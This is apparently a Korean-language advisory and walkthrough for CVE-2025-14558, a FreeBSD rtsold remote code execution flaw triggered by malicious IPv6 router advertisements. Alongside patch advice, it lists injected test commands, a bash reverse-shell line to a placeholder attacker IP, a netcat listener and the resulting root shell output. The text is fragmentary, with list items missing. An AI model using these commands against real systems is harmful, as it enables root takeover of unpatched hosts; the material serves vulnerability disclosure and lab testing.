
CVE-2025-14558
CVE-2025-14558은 IPv6 라우터 요청 서비스를 사용하는 FreeBSD 시스템에 영향을 미치는 심각한 원격 코드 실행(RCE) 취약점입니다. 신뢰할 수 없는 네트워크 입력 처리 방식의 결함으로 인해 공격자가 임의의 셸 명령을 실행할 수 있습니다.
rtsol(8)rtsold(8)resolvconf(8)에 안전하지 않게 전달됩니다.성공적으로 악용되면 공격자는 다음을 수행할 수 있습니다:
강력히 권장되는 조치:
rtsol/rtsold 비활성화신뢰할 수 없는 네트워크에서 IPv6 라우터 광고를 수신하는 모든 FreeBSD 시스템은 높은 위험에 처해 있습니다. 즉시 패치하거나 영향을 받는 서비스를 비활성화하십시오.
CVE-2025-14558에 대한 PoC 스크립트가 취약한 FreeBSD 시스템(패치되지 않았고, rtsold가 실행 중이며 IPv6 RA 메시지를 처리하는 상태)에서 성공적으로 작동하는 경우:
rtsold가 루트로 실행되고 악성 도메인으로 /sbin/resolvconf를 호출하기 때문).--command "id > /tmp/pwned"와 같은 간단한 테스트의 경우:
다음과 같은 출력이 포함된 /tmp/pwned 파일이 생성됩니다:
uid=0(root) gid=0(wheel) groups=0(wheel)
--command "touch /tmp/exploit_success"의 경우:
/tmp/exploit_success가 나타납니다.--command "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"와 같은 리버스 셸의 경우:
다음과 같은 명령으로 대상에서 확인하십시오:
ls -l /tmp/pwned
cat /tmp/pwned
스크립트 출력:
[+] Sending malicious RA on eth0
[+] Injected command: id > /tmp/pwned
[+] Target must run vulnerable rtsold and process the RA
[+] Done. Check target for execution (e.g. /tmp/pwned)
리버스 셸의 경우: 성공하면 nc -lvnp 4444가 연결을 수신하고 루트 셸을 얻습니다:
listening on [any] 4444 ...
connect to [YOUR_IP] from (UNKNOWN) [target_ip] XXXXX
bash: cannot set terminal process groups: No job control in this shell
bash: no job control in this shell
root@vulnerable-host:~ #
(이제 루트 셸을 획득했습니다 – id, whoami 등의 명령을 입력하십시오.)
rtsold가 실행 중이 아님, 동일한 L2 네트워크에 없음, 방화벽이 RA를 차단함, 또는 IPv6가 비활성화됨.이는 취약한(2025년 12월 16일 패치 이전) FreeBSD 시스템의 통제된 실험실에서만 관찰 가능합니다. 2025년 12월 23일 기준 공개된 실제 악용 사례는 없습니다. 프로덕션 환경에서는 즉시 패치하십시오.